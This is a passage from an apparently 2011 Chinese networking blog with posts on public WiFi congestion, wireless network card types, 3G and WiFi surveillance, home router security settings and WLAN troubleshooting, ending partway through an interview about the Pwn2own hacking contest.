  虽然多出来的热点可以通过关闭设备来减少,但是从商业的角度说,企业提供公共热点服务还需要考虑到带宽和网络维护成本。
  Cisco Systems新加坡分公司部门经理J. Ramesh Babu表示,公共Wi-Fi网络拥塞的另一个原因是设备老化,或使用了其它部门淘汰下来的设备,这在目前的商业环境下很常见。他说,使用老旧的客户端设备会降低整个网络的性能,尤其是在大量使用富媒体数据的时候。
  他还补充说,在设计和部署公众或户外WiFi网络时所面临的挑战可以通过正确的网络配置和工具,以及恰当的部署计划来解决。比如,他建议场馆的经营者在考虑部署WiFi网络时采用支持范围更广的设备,比如能够支持蜂窝和WiFi的双模IP电话,笔记本和智能手机等。
  另外,他提醒经营者,无线网络的覆盖范围会受到建筑环境的影响,比如墙体,隔断以及电梯间等。另外,无线网络还可能受到无绳电话、蓝牙或其它无线设备的干扰。
  WiFi服务提供商可以利用工具解决这一问题,他们通过检测和自动调整射频的方式让WiFi网络能够在对应的环境下正常工作。
  消费者渴望 Wi-Fi接入
  Babu 表示,随着越来越多的企业实行移动办公,能够随时随地接入到WiFi网络已经成了企业员工,企业合伙人,以及消费者的“逻辑期望”,甚至有些企业希望公司资产都能随时上网。
  Ovum资深顾问 Craig Skinner对此表示赞同。他认为,随舍移动设备,比如智能手机以及掌上电脑的普及,对WiFi接入的需求将不断增加。
  他还表示,公共 Wi-Fi 网络如果用来完成这种工作,将从智能手机,平板电脑甚至笔记本那里承担相当高密度的流量。在重申了Wang的观点后,Skinner表示,问题仍然回到建造这种网络的成本以及覆盖范围上。
  在一次邮件采访中,他明确表示,让一个由公共基金维护的户外WiFi网络具有像科技会议会场中的WiFi网络一样的性能,是不现实的想法。
  他解释说,大多数时候,公共Wifi接入所提供的免费服务只是用来吸引消费者到这里消费或吸引企业来这个场所举办活动。但是归根到底,网络架构的部署费用和运营成本还是必须支付。
  而由于消费者并不需要直接承担这部分费用,因此场所的经营者们也就没有足够的热情去投入更多经费建立高质量的网络服务,尤其是在那些网络流量高峰很少出现的场所更是如此。
  另外,Skinner还表示,接入设备的天线装置也是影响接入质量的因素之一。他解释说,天线的尺寸和它的功率会影响网络的覆盖范围以及网络的连接稳定性。因此,如果手机这样的小设备总是感觉网络拥堵,难以接入,那么有可能是因为网络设备的天线问题,而不是管理者有意将这些用户踢下网。
  Springboard 的wang认为,就算WiFi服务能够像消费者期望的那样更广泛,甚至能够在飞机上使用,WiFi也不能算是最优的移动性解决方案。他说:“WiFi热点之间并不能快速切换,因为与3G或WiMax相比,WiFi网络的覆盖范围太小,如果我们采用WiFi作为移动宽带接入解决方案,那么用户的设备在运动中就会产生大量切换数据,从而浪费网络资源。因此,WiFi并不适合用于城际移动解决方案。”
类别:Wireless N.T | Tags: , | 0 条评论, 656 次阅读
Apr
14
2011
无线网卡的分类与使用
无线网卡究竟是什么?也许对于初识者来说,还不清楚,先让我们来看一下无线网卡的介绍吧。

无线网卡的起源

一说到无线网卡的历史起源,就不能不提到无线局域网的的历史。无线局域网的的起源可以追溯到二十世纪四十年代的第二次世界大战期间,当时美国陆军就采用了无线电信号做资料的传输,他们研发出了一套无线电传输技术,并且采用非常高的加密技术。 后来,这项技术就在美军和盟军中间广泛使用了;这让一些学者对此产生了兴趣并从中得到了灵感。

1971年,夏威夷大学(University of Hawaii)的研究人员创造了第一个基于封包式技术的无线电通讯网络,被称为ALOHNET网络,是最早的无线局域网(wireless local area network,WLAN)。这个WLAN包括了7台计算机,采用双向星型拓扑(bi-directional star topology)横跨四座夏威夷的岛屿,中心计算机放置在瓦胡岛(Oahu Island)上。从这时起,无线局域网可以说是正式诞生了。

虽然从有限的资料中我们无法找到有关无线网卡的只言片语,但我们可以肯定的是其中必定出现了今天无线网卡的始祖。如果从1971年世界上第一个无线网络实验成功开始计算,那么到现在为止无线网卡的历史也就短短的35年。事实上,无线局域网的大规模发展是在20世纪90年代。

1997年IEEE(The Institute of Electrical and Electronics Engineers)提出并制定了最早的无线标准IEEE 802.11;在1999年9月又提出了IEEE 802.11a标准和IEEE 802.11b标准。

随着IEEE802.11a、IEEE802.11b标准的出台以及Wi-Fi组织的成立促进了无线局域网产品的兼容化、标准化以及市场化。从此以后,无线局域网随着电脑的普及得到了人们越来越多的关注。 无线网卡实际上是一种终端无线网络设备,它是需要在无线局域网的无线覆盖下通过无线连接网络进行上网使用的。换句话说无线网卡就是使你的电脑可以利用无线来上网的一个装置,但是有了无线网卡也还需要一个可以连接的无线网络,因此就需要配合无线路由器或者无线AP使用,就可以通过无线网卡以无线的方式连接无线网络可上网。

无线网卡的作用、功能跟普通电脑网卡一样,是用来连接到局域网上的。它只是一个信号收发的设备,只有在找到上互联网的出口时才能实现与互联网的连接,所有无线网卡只能局限在已布有无线局域网的范围内。无线网卡就是不通过有线连接,采用无线信号进行连接的网卡。

无线网卡可以根据不同的接口类型来区分,第一种是USB无线上网卡,是目前最常见的;第二种是台式机专用的PCI接口无线网卡;第三种是笔记本电脑专用的PCMCIA接口无线网卡;第四种是笔记本电脑内置的MINI-PCI无线网卡。

就如上面所说,我们光有无线网卡是无法连接无线网络,还必须有无线路由器或无线AP。无线网卡就好比是接收器,无线路由相当于发射器。其实还是需要有线的Internet线路接入到无线猫上,再将信号转化为无线的信号发射出去,由无线网卡接收。一般的无线路由器可以拖2-4个无线网卡,工作距离在50米以内效果较好,远了通信质量很差。

无线网卡主流的标准是IEEE 802.11n,它大幅提升无线局域网竞争力,无线局域网标准、技术快速发展,产品逐渐成熟,无线局域网的应用也日益丰富。越来越多的家庭用户开始使用无线网络,许多企业也纷纷在自己的办公大楼内布设无线局域网,同时,电信运营商对无线局域网也给予了极大关注,现在无论是在机场、酒店、咖啡厅等公共区域铺设公众无线网络,给大家提供方便的无线上网。

类别:Wireless N.T | Tags: , | 0 条评论, 637 次阅读
Apr
6
2011
    3G无线监控
  严格来说,分为2G和3G二种方式;一种是早前的2G模试,另一种是最新版的3G模试。
  1、2G无线监控传输方式主要包括CDMA、GSM两种模式。此两种模式硬件成本较低,覆盖面大,传输速度慢,理论值传输速率最高为153.6Kbps,在实际使用中基本只达到60~80Kbps。因为视频图像最底要求512Kbps才能流畅传输,此速度远远达不到视频要求。因此在无线监控项目中,很少有厂商去选用。另外一个最大的缺点是运营商收取的流量费太高,每个月,每年,都会产生大笔的费用。一般只有在很偏远,WIFI无线设备做不到的情况下,并有一定资金时才会考虑。
  2、3G无线监控是采用移动(TD-SCDMA)、电信(CDMA2000 EVDO)、联通(WCDMA)运营商的3G技术接入方式,自09年起,经各运营商大力推广,已有不少监控厂家针对此方面研发相关的产品。而3G突出的优点即高速的下载能力,理想值可达到3Kbps~20Mbps的传输速率,但目前因其仍处于推广阶段,因此在传输速率这方面还有待进一步考证。
  3G目前存在无线带宽容量有限、接入用户有限、时延长等缺陷,在多用户共享的情况下,难以保证无线视频监控的速率和时延要求,主要缺点还是运营商收取的流量费太高,一般客户无法接受。
  WIFI式无线监控
  严格来说,WIFI式无线监控又分为二种方式;一种是模拟无线监控;另一种是数字无线监控。
  1、模拟无线监控就是将视频信号直接调制在2.4G或1G的无线通道上,通过天线发射出去,监控中心通过天线接收无线信号,再通过无线接收机解调出原来的视频信号,这种监控方式没有压缩损耗,几乎不会产生延时,因此可以保证视频质量,但其只适合点对点近距离(1KM以内)单路传输,不适合规模部署。
  此外因为没有调制校准过程,抗干扰性差,频点少,所以在无线信号环境复杂的情况下自身会产生很大干扰性,造成图像混乱,丢失等情况。因此在有多路图像要传输的情况下,不建议用此方式传输。
  2、数字无线监控就是先将视频信号编码压缩,通过数字无线信道调制(2.3G/2.4G/5.8G等),再利用天线发射出去。接收端则相反,由天线接收信号,随后无线解扩及视频解压缩,最后还原为模拟的视频信号传输出去,此种方式也是目前国内市场较多使用的。数字微波的伸缩性大,通信容量最少可用几十个频道,且建构相对较易,通信效率较高,运用灵活。
  数字无线有模拟无线不可比的优点,如大面积(5-30平方公里)、监控点位多(5-500个点)需要加中继的情况多、情况复杂且干扰源多时采用LP5800-WBS  WIFI基站为中心再配合基站前端CPE设备方式传输性价比非常高。数字无线容量大、抗干扰能力强、保密性好,同样的发射功率传输距离更远,受地形或障碍物影响较小,接口丰富,扩展能力强等。
  当然,不同的无线传输技术都有其各自适用的场所。如在工厂、油田、边防、森林等,采用WIFI的无线监控较多,随着3G各方面性能的提升、流量费用的下降、网络环境的成熟,以及大范围无线监控的普遍需求,也会促使3G的进一步使用。  
类别:Wireless N.T | Tags: , , | 0 条评论, 848 次阅读
Apr
2
2011
解析无线设备的安全性
  无线路由器、AP及无线网卡为代表的无线网络产品,已经逐渐打破家庭和中小企业市场中Hub以及普通路由器“一统天下”的局面,成为构建SOHO和中小型网络的首选。市场需求巨大、价格的敏感、同类产品竞争的激烈,都要求无线产品生产厂商必须想尽一切办法压低成本,而一些中小企业为了降低成本更是“饥不择食”。一些假冒伪劣产品的出现给消费者带来的的困扰和问题如下:
  死机
  恐怕现在无线产品消费者反映最强烈的问题就是无线产品突然停止工作、死机。特别是在新手第一次使用无线路由器的时候,这个问题更常见,一般的原因就是配置出现问题,在反复选择恰当的选项后一般都能解决。但有的用户反映,无线产品总是隔三差五出现死机,而无线产品的售后服务人员也没有什么好办法来解决,无非是再三告诉用户将软件版本升级到最新,或者干脆说硬件设计存在问题。
  有效距离短
  这个问题已经见怪不怪了,一般无线产品的实际有效距离能够达到其宣称的最大距离的1/3~1/2就算不错了。这个问题的出现有诸多方面的因素,例如无线天线的有效性、无线产品的位置、无线产品间的障碍物、无线产品的散热效果等,这些都会成为无线产品厂家推脱其产品质量的借口。在这种情况下,要达到增加传输距离的目的,可以采取重新选择合理的位置布放无线天线、为无线产品增加增益天线等方式。如果感兴趣,还可以自己动手做一个简单的增益天线,说不定增益效果能让你十分满意。
  频频断线
  很多朋友在使用无线产品的时候,经常会发现无线信号忽强忽弱、忽断忽续,除了环境影响和电磁波的干扰因素外,主要是由无线产品本身的稳定性和质量原因造成的。比如在使用无线路由器时,虽然网络连接仍然“健在”,但是已经无法访问到互联网,而重新启动路由器后,就可以恢复正常,这种情况就是典型的无线产品的不稳定造成的。
  拨打厂家的售后服务电话进行询问,很可能得到两种答案,一种是说与之配合的无线网卡兼容性有问题,一种是说升级一下软件版本,实在解释不通时,就说这是个特殊情况,总之承认自身产品有问题的厂商几乎没有。
  无线产品的选择还希望大家在购买时多留意,不要图一点微薄的利益给自己带来更大的麻烦。
  无线设备带来的问题如下:
  兼容性差
  我们常常会遇到这样的情况,无线产品的说明书中清楚地告诉消费者,其产品兼容某某技术的产品,但是在实际使用中却并非如此。无线安全兼容性差主要表现在一个厂商生产的无线路由器或无线AP与另外的厂商生产的无线网卡连接工作时不兼容。
  产生不兼容的原因是,不同厂家使用的芯片等硬件和使用的技术有区别,或者是早期的产品跟应用新技术的新产品之间的兼容性不好,例如一些无线产品是在迅驰技术出现之前就设计完成的,在设计时根本就没有考虑到迅驰会如此普遍使用,从而导致对迅驰的兼容性不好。兼容性问题将直接导致无线产品之间无法连接,或者连接速度较差。
  抗干扰性差
  随着日常使用的电子产品的逐渐增多,与无线产品使用相同频段的产品也越来越多,这极大地影响了无线路由器与无线网卡之间数据传输的速率,这就对无线产品的抗干扰性提出了更高的要求。
  干扰主要来自两个方面,首先是来自附近同频段无线设备的干扰,随着无线市场的发展与无线产品的使用密度不断增大,该问题在公司、写字楼、商业区、住宅区都极易发生。
  另外,其他一些干扰源也会对无线路由器的天线收发效果有较大影响,例如无绳电话(2.4或5.xGHz)、蓝牙设备(2.4GHz)、脉冲雷达 (5.4GHz)、微波炉(在2.4GHz频宽中50%的忙闲度将产生脉冲干扰)、低能量RF光源(2.4GHz)等。一些无线产品为了降低制造成本,抗干扰性设计和屏蔽金属材料都比较差,导致无线产品抗干扰性差或者根本没有抗干扰性。
  散热性差
  无论是无线路由器还是无线网卡,其芯片和各种器件都是工作在一定工作环境下的,例如温度有一定的范围,如果温度太高将直接导致工作效率的下降,甚至导致无线产品的损坏。无线产品工作时必然会产生一定的热量,所以能否及时散热是无线产品质量检验的重要指标,这与无线产品的设计结构、工作功率、散热特点、散热材料等密切相关。
  有的无线产品因为片面追求美观和低成本,而大量采用散热效果不好的材料和结构,这都会导致无线产品长时间工作过热,从而影响连接速度,甚至损坏硬件。
  无线网卡的工作并不是只要能在PC上正常安装即可,要充分考虑与无线路由器或AP的兼容性和配合性,否则会影响无线传输距离和工作效率,所以在购买时不要仅仅试验在笔记本电脑中能否正常安装使用,而关键要看能否与无线设备配合好。
类别:Wireless N.T | Tags: , , | 0 条评论, 683 次阅读
Apr
2
2011
无线路由器安全设置技巧
  无线路由器安全设置:DHCP—自动获取IP,还是固定IP?
  DHCP(Dynamic Host Configuration Protocol)动态主机设定协议的功能就是可在局域网内自动为每台电脑分配 IP地址,不需要用户设置IP地址、子网掩码以及其他所需要的TCP/IP参数。它分为两个部份:一个是服务器端(在 这里指的是具有DHCP服务功能的无线AP或无线路由器),而另一个是客户端(用户的个人电脑等无线客户端设备)。 所有的IP网路设定资料都由DHCP服务器集中管理,并负责处理客户端的DHCP要求;而客户端则会使用从DHCP服务器分配下来的IP环境资料。
  如果无线AP或无线路由器启用了DHCP功能,为接入无线网络的主机提供动态IP,那么别人就能很容易使用你的 无线网络。因此,禁用DHCP功能对个人或企业无线网络而言很有必要,除非在机场、酒吧等公共无线“热点”地区 ,则应打开DHCP功能。一般在无线路由器的“DHCP服务器”设置项下将DHCP服务器设定为“不启用”即可。这样既 使能找到该无线网络信号,仍然不能使用网络。我们给出的建议是:采用不是很常用私有网段的静态方式,最好不要用192.168.0.0-192.168.0.255这个常用私有网段,让人一猜就中。
  无线路由器安全设置:这里提示大家如何让WEP更安全
  (1)使用多组WEP密钥,使用一组固定WEP密钥,将会非常不安全,使用多组WEP密钥会提高安全性,但是请注意 WEP密钥是保存在Flash中,所以某些黑客取得您的网络上的任何一个设备,就可以进入您的网络;
  (2)如果你使用的是旧型的路由器,且只支持WEP,你可以使用128位的WEP Key,这样会让你的无线网络更安全 。
  (3)定期更换你的WEP密钥。
  (4)你可以去制造商的网站下载一个固件升级,升级后就能添加WPA支持。
  WPA(Wi-Fi保护接入)能够解决WEP所不能解决的安全问题。简单来说,WEP的安全性不高的问题来源于网络上各 台设备共享使用一个密钥。该密钥存在不安全因素,其调度算法上的弱点让恶意黑客能相对容易地拦截并破坏WEP 密码,进而访问到局域网的内部资源。
  WPA是继承了WEP基本原理而又解决了WEP缺点的一种新技术。由于加强了生成加密密钥的算法,因此即便收集到分组信息并对其进行解析,也几乎无法计算出通用密钥。其原理为根据通用密钥,配合表示电脑MAC地址和分组信 息顺序号的编号,分别为每个分组信息生成不同的密钥。然后与WEP一样将此密钥用于RC4加密处理。
  通过这种处理,所有客户端的所有分组信息所交换的数据将由各不相同的密钥加密而成。无论收集到多少这样的数据,要想破解出原始的通用密钥几乎是不可能的。WPA还追加了防止数据中途被篡改的功能和认证功能。由于 具备这些功能,WEP中此前倍受指责的缺点得以全部解决。WPA不仅是一种比WEP更为强大的加密方法,而且有更为 丰富的内涵。作为802.11i标准的子集,WPA包含了认证、加密和数据完整性校验三个组成部分,是一个完整的安全性方案。
  无线路由器或AP在出厂时,数据传输加密功能是关闭的,如果你拿来就用而不作进一 步设置的话,那么你的无线网络就成为了一个“不设防”的摆设,这是大家需要注意的。我们给出的建议是:采用WPA加密方式。
  无线路由器安全设置:WEP、WPA—WEP加密,还是WPA加密
  无线网络加密是通过对无线电波里的数据加密提供安全性,主要用于无线局域网中链路层信息数据的保密。现在大多数的无线设备具有WEP加密和WAP加密功能,那么我们使用WEP加密,还是WAP加密呢?显然WEP出现得比WAP早 ,WAP比WEP安全性更好一些。
  WEP采用对称加密机制,数据的加密和解密采用相同的密钥和加密算法。启用加密后,两个无线网络设备要进行通信,必须均配置为使用加密,具有相同的密钥和算法。WEP支持 64 位和128 位加密,对于 64 位加密,密钥为 10 个十六进制字符(0-9 和 A-F)或 5 个 ASCII 字符;对于 128 位加密,密钥为 26 个十六进制字符或 13 个 ASCII 字符。
  无线路由器安全设置:MAC地址—网络世界的DNA
  由于每个无线网卡都有世界上唯一的物理地址MAC,因此可以在无线AP(或无线路由器)中手工设置一组允许访问的主机的无线网卡MAC地址列表,实现物理地址过滤。这要求我们必需随时更新AP 中的MAC地址列表。
  设置MAC地址过滤对于大型无线网络来说工作量太大,但对于小型无线网络则不然,因此我们应不怕麻烦。MAC 地址在理论上是可以伪造,因此它是较低级别的认证方式。我们给出的建议是:对于家庭及小型办公无线网络,用户不是很多,应该设置MAC地址过滤功能。
  无线路由器安全设置:SSID—隐藏自己
  无线路由器一般都会提供“允许SSID广播”功能。如果你不想让自己的无线网络被别人的无线网卡“轻易”搜 索到,那么最好“禁止SSID广播”。SSID通俗地说便是给无线网络所取的名字,它的作用是区分不同的无线网络。
  SSID是无线网卡发现无线网络的第一要素,开启广播SSID以后,在无线网络的效覆盖范围内,无线网卡会自动 找到该网络,并尝试与之连接。若我们不愿将自己的无线网络曝露在大庭广众之内,我们应想到隐藏自己无无线网络的SSID,应把“广播SSID”这项功能关闭。“广播 SSID”关闭以后,无线网卡不会自动找到无线网络,到接入 到这个无线网络需要手动添加SSID。我们给出的建议是:隐藏SSID。
  无线路由器安全设置:如何让无线网络更安全
  据互联网的资料,使用以下软件:Network Stumbler、WildPackets AiroPeek NX 、OmniPeek 4.1和 WinAircrack等,这些软件只要有足够长的时间来抓取正在通信中的无线网络通信信号,就可以破解包括WEP加密、 WPA加密、MAC过滤、SSID隐藏等无线网络安全设置。
  这听起来不免令我们失望,那么如何让无线网络更安全。确保尽可能的让无线接入网络不要依赖于WEP等技术而尽可能的采取其他更为安全手段,目前实现这个目标的方法主要有VPN技术,如:使用安全协议如点对点隧道协议 (PPTP)或者第二层隧道协议(L2TP),使用IPSec,SSL 等VPN技术。这样既可以获得访问控制功能,也可以获得端到端(程序至程序)的加密功能。
类别:Wireless N.T | Tags: , , | 0 条评论, 627 次阅读
Mar
28
2011
无线局域网故障修复  
  无线局域网(小型)在过去,是用于收发电子邮件和浏览网页的,无线局域网通常是由射频专家用的手动工具来排除网络故障的。但是随着数据流量大小和差异性日益显著,再加之无线局域网已经成为了网络接入的主要手段之一,无线局域网故障修复手段也得到了快速的成长。
  WLAN管理工具如何提高WLAN故障修复的能力
  随着802.11被越来越多地应用于各种消费性电子产品当中,如笔记本电脑、小型上网本、智能手机、打印机、摄像机等,用户在不同地方接入至网络的性能会因为设备不同而有所不同。为了达到最佳效果,咨询台必须对历史性数据和实时数据都有高度的洞察力。
  这也正是当今WLAN管理工具当道的一个重要原因。例如,Meraki's 云计算控制器可显示每一个连接的客户端的近乎于实时的状态数据。除此之外,它还可以提供一些基本的功能(如,已连接AP的识别,在AP上Ping客户端,以及监测输入或输出计数器等)。该控制器的用法对咨询台来说相当简单,并且只需要在web上查看相关内容对他们来说方便了许多。
  然而,随着网络的复杂程度日趋显著,相应的故障排除难度也在增加。当前,客户端可自由快速地在若干个AP之间漫游;有一些办公场所很可能会用多种不同品牌不同型号的AP进行连接,优秀的第三方WLAN管理通常也是比较有保障的。比如 Aruba的AirWave Management Platform就能显示多个供应商的AP,并根据客户端的职位特征进行调整,如咨询台,网络运营中心,或工程师们。对于每个连接都会有实时的监测和映射,并会记录下来以便进行趋势分析。其目的就是快速辨别故障的来源,是用户错误、客户端配置、网络中断、信号较弱,还是信号堵塞问题。与于Aruba的AirWave类似的监测工具,能解决大多数的第一层网络问题,如果出现其他问题则就需要申报至更高级别的工程师(第二层或第三层)。
  使用分布式传感平台进行能动的WLAN测试
  当然,最重要的就是要在故障还没有影响到用户体验之前,就识别、侦测并排除掉。正是由于这个原因,企业通常会运行自动化网络诊断测试——定期地连接至关键服务器和应用程序以快速识别NOC故障。
  然而,在WLAN中进行网络担保是比较困难的,因为WLAN中的用户移动频率都比较高。要知道AP可达并不等同于验证了这个来自不同地域,使用不同SSID或频段的无线客户端可连接至该AP。对于后者,可以考虑类似于Motorola AirDefense Network Assurance Suite 或 7signal Sapphire的工具。
  这些工具都使用了远距离配置Wi-Fi传感器来创建分布式测试平台。例如,AirDefense套件就是无线入侵防御系统(WIPS) 的扩展,它可以定期连接至附近的AP,就像“真实”的客户端。一旦连接后,这些传感器的客户端就可以运行网络担保测试,提前对NOC作出告警,并提供诊断数据(例如,远程数据包捕获,或其他关键指标)。
  使用基于AP的频谱分析仪对信号质量进行监测
  在WLAN中,由用户错误,客户端配置或上行网络/应用程序崩溃造成的故障是不能“自动复原”的。然而,有时候由信号覆盖较弱,或RF干扰导致的故障,却可以通过AP和控制器完成自我恢复。
  几乎所有的AP都具有匹配最佳通道的特性。对于有些控制器来说,管理员可以立即释放一些通道,或者设置多长时间进行再一次检测。无线资源管理的算法千变万化,但是通常需要考虑的就是这些每条通道上的AP以及它们的信号强度。在5GHz DFS通道中,其他的信号传送器(譬如雷达系统)也需要考虑在内的。
  但是由非802.11干扰引起的问题还是比较难诊断或避免的。当遇到这类故障时,传统的做法是,使用手持式信号分析仪进行抽样,这种方法有着一定的局限性。分散的干扰可能在抽样时没有传输。在嘈杂的高密集度的地方,光谱图很难形象地说明具体情况。到抽样值说明清楚后,解决方案可以又要改变了。
  为了克服这些局限性,几家供应商,包括Aruba、Cisco、Meraki以及Motorola,现今都开始提供基于AP的频谱分析仪。虽然这些分析仪的性能各异,但是此类的工具都使用了AP去监听非802.11干扰。甚至还有几款产品应用了数字签名来识别干扰(如摄像机、电话等)。例如,Cisco的Clean Air 就可以定期地设定Aironet 3500 AP至监测模式,来分析2.4和5GHz干扰,并可以根据实际情况重新分配通道,避免802.11和非802.11干扰。
  无线局域网再被企业组件式时,经常会遇到一些网络故障,像无线信号不稳定、可以搜索到信号无法动态获取ip地址、经常出现瞬间断开又连上等这样的现象是经常发生的,那么,以上的无线局域网故障修复措施就是很好的解救办法。
类别:Wireless N.T | Tags: , , , | 0 条评论, 726 次阅读
Mar
24
2011
  无线网络技术已经深入人心,那么我们该如何进行设置,并且在设置的时候我们应该注意哪些问题呢,这里就给我们详细的介绍一下。
  组建家庭Infrastructure无线网络,无线网卡的设置和Ad-hoc网络大同小异,主要应注意以下几点。
  无线网卡设置(1):如果设置了无线路由器DHCP服务器为动态分配IP,那么就不要为无线网卡在TCP/IP协议中指定IP地址,以免画蛇添足。DHCP服务器会为无线网卡自动分配IP地址。如果无线网卡和新加入的无线系统的无线路由器DHCP服务器的IP地址不“同步”,可重新启动无线客户端电脑便可。
  无线网卡设置(2):可根据无线网卡上的指示灯或Windows桌面右下角工具栏中的无线网卡图标判断无线网卡是否已和无线路由器正常连通。一般来说,显示红色表明无线网络没有联通,如显示绿色则表明已搜索到无线网络并正常联通。
  无线网卡设置(3):在Windows桌面右下角工具栏中的无线网卡图标中可对无线网卡的主要参数进行设置。在“Network Mode(网络模式)”选项中应选择为“Infrastructure”模式,也就是无线网卡与无线AP相连的模式。
  在“SSID”相关选项中如果无线路由器设置了广播模式,可选为“ANY(First Available Access Point)”自动侦测模式即可。如果没有广播SSID,则填入您在无线路由器中自行设置的SSID名称即可。
类别:Wireless N.T | Tags: , , | 0 条评论, 719 次阅读
Mar
24
2011
无线网络基础无线网卡的分类与使用 
  无线网卡究竟是什么?也许对于初识者来说,还不清楚,先让我们来看一下无线网卡的介绍吧。
  无线网卡的起源
  一说到无线网卡的历史起源,就不能不提到无线局域网的的历史。无线局域网的的起源可以追溯到二十世纪四十年代的第二次世界大战期间,当时美国陆军就采用了无线电信号做资料的传输,他们研发出了一套无线电传输技术,并且采用非常高的加密技术。 后来,这项技术就在美军和盟军中间广泛使用了;这让一些学者对此产生了兴趣并从中得到了灵感。
  1971年,夏威夷大学(University of Hawaii)的研究人员创造了第一个基于封包式技术的无线电通讯网络,被称为ALOHNET网络,是最早的无线局域网(wireless local area network,WLAN)。这个WLAN包括了7台计算机,采用双向星型拓扑(bi-directional star topology)横跨四座夏威夷的岛屿,中心计算机放置在瓦胡岛(Oahu Island)上。从这时起,无线局域网可以说是正式诞生了。
  虽然从有限的资料中我们无法找到有关无线网卡的只言片语,但我们可以肯定的是其中必定出现了今天无线网卡的始祖。如果从1971年世界上第一个无线网络实验成功开始计算,那么到现在为止无线网卡的历史也就短短的35年。事实上,无线局域网的大规模发展是在20世纪90年代。
  1997年IEEE(The Institute of Electrical and Electronics Engineers)提出并制定了最早的无线标准IEEE 802.11;在1999年9月又提出了IEEE 802.11a标准和IEEE 802.11b标准。
  随着IEEE802.11a、IEEE802.11b标准的出台以及Wi-Fi组织的成立促进了无线局域网产品的兼容化、标准化以及市场化。从此以后,无线局域网随着电脑的普及得到了人们越来越多的关注。 无线网卡实际上是一种终端无线网络设备,它是需要在无线局域网的无线覆盖下通过无线连接网络进行上网使用的。换句话说无线网卡就是使你的电脑可以利用无线来上网的一个装置,但是有了无线网卡也还需要一个可以连接的无线网络,因此就需要配合无线路由器或者无线AP使用,就可以通过无线网卡以无线的方式连接无线网络可上网。
  无线网卡的作用、功能跟普通电脑网卡一样,是用来连接到局域网上的。它只是一个信号收发的设备,只有在找到上互联网的出口时才能实现与互联网的连接,所有无线网卡只能局限在已布有无线局域网的范围内。无线网卡就是不通过有线连接,采用无线信号进行连接的网卡。
  无线网卡可以根据不同的接口类型来区分,第一种是USB无线上网卡,是目前最常见的;第二种是台式机专用的PCI接口无线网卡;第三种是笔记本电脑专用的PCMCIA接口无线网卡;第四种是笔记本电脑内置的MINI-PCI无线网卡。
  就如上面所说,我们光有无线网卡是无法连接无线网络,还必须有无线路由器或无线AP。无线网卡就好比是接收器,无线路由相当于发射器。其实还是需要有线的Internet线路接入到无线猫上,再将信号转化为无线的信号发射出去,由无线网卡接收。一般的无线路由器可以拖2-4个无线网卡,工作距离在50米以内效果较好,远了通信质量很差。
  无线网卡主流的标准是IEEE 802.11n,它大幅提升无线局域网竞争力,无线局域网标准、技术快速发展,产品逐渐成熟,无线局域网的应用也日益丰富。越来越多的家庭用户开始使用无线网络,许多企业也纷纷在自己的办公大楼内布设无线局域网,同时,电信运营商对无线局域网也给予了极大关注,现在无论是在机场、酒店、咖啡厅等公共区域铺设公众无线网络,给大家提供方便的无线上网。
类别:Wireless N.T | Tags: , , | 0 条评论, 660 次阅读
Mar
24
2011
无线网络安全无线网络中怎么隐藏无线网络  
  无线网络中怎么隐藏电脑
  要在无线网络中隐藏自己的电脑,方法有很多,例如单击“开始/运行”,然后输入“cmd”开启命令提示符窗口,在该窗口中输入“net config server /hidden:yes”,或者在无线网络连接的属性窗口中,取消“Microsoft网络的文件和打印机共享”,这样其他人通过网上邻居就无法找到自己的电脑了。
  为了防止电脑的IP地址泄漏,可以启动无线网络连接的防火墙功能,并在防火墙属性的“高级”标签中设置ICMP,将所有传入和传出请求都禁止,这样别人就无法用ping.exe来判断自己的电脑是否在线了。
  WinXP默认自动管理无线网络,实际上只有需要访问无线网络资源时,才有必要让系统自动连接到无线网络,所以在平时可以取消“用Windows配置我的无线网络设置”选项,这不但安全,而且更加节省了资源。或者点击“高级”按钮,取消“自动连接到非首选的网络”,这样系统不会轻易连接到以前没有检测到的无线网络。
  无线路由器隐身却可访问
  要在空气中隐藏无线路由器最直接的方法是让它停止SSID广播,SSID广播功能将无线路由器所创建的无线网络让客户端可以搜索到,这虽然方便了用户接入无线网络,但是也方便了非法接入,所以在需要安全的场合,比如公司网络,最好将它禁止。
  这样一来,用WinXP或无线网卡自带程序就无法像平常一样搜寻到该无线路由器创建的无线网络,要访问它就只能手动添加首选网络并指定SSID名称。
  隐藏SSID广播却无法对付NetStumber,它还是可以检测到隐藏的无线网络,所以必须再利用无线路由器本身的一些功能,包括了停止DHCP服务并且修改LAN口的默认IP地址,由于无线网络的SSID采用广播方式向外发散,即使无线网络被检测到,如果入侵者没有获得或配置与无线路由器同网段的IP地址,还是无法连接到无线路由器的,这也是TCP/IP网络连通讯的先决条件,即同个网络间设备的IP地址必须在同一网段。
类别:Wireless N.T | Tags: , , | 0 条评论, 784 次阅读
Mar
24
2011
一年一度的Pwn2own黑客大赛已经落下帷幕。这次大赛有哪些亮点?浏览器和手机安全问题是否迫在眉睫?这次我们有幸邀请到圈子里两位知名的网络安全研究人员,一起聊一聊2011年的Pwn2own。

附采访实录:

关于智能手机安全的问题,今天我们有幸采访到资深无线安全研究人员,《无线网络安全攻防实战》系列书籍的作者 杨哲。

问:Pwn2own2011年的黑客大赛已经落下帷幕了。我们发现目前有一些人认为,越是开放的手机系统越不安全。这次参与比赛的四款手机系统,有开源的,也有封闭的。是不是越封闭的系统,比如是windows mobile,攻破的难度就越大呢?

答:不是这样的,我们举个例子,在过去的10多年来,Windows由于其便捷的窗口化操作和用户不可见的后台处理机制,赢得了大量的用户。但与此同时,也吸引了大量的黑客及组织对其研究,那最终的结果我们都知道,就是微软的漏洞数量和发布频率要比其它操作系统高很多,而直到现在Windows并没有像Linux一样开源。同样地,在智能手机领域,Windows Mobile占据的江山可以说还没有达到和Windows XP这样一个级别,所以可以看到在06年以前无论是手机病毒还是攻击的对象都主要是Nokia的Symbian,为什么呢,因为Nokia占据了80%的手机市场。但在最近几年,随着使用Windows Mobile系统的智能手机在市场占有率的提高,也爆出了多个威力比较大的漏洞,比如09年比较出名的HTC智能手机爆出的蓝牙协议栈漏洞,这个漏洞是由于HTC在开发基于Windows Mobile的蓝牙驱动时的疏漏所致,但经过测试,发现它影响到了09年7月前出厂的几乎所有基于Windows Mobile6/6.5的HTC手机。

总的来说,就是说,并不是封闭的系统,其攻破的难度就越大。按照这个理论,那是不是说只要选择闭关锁国,这样就可以无敌了?呵呵

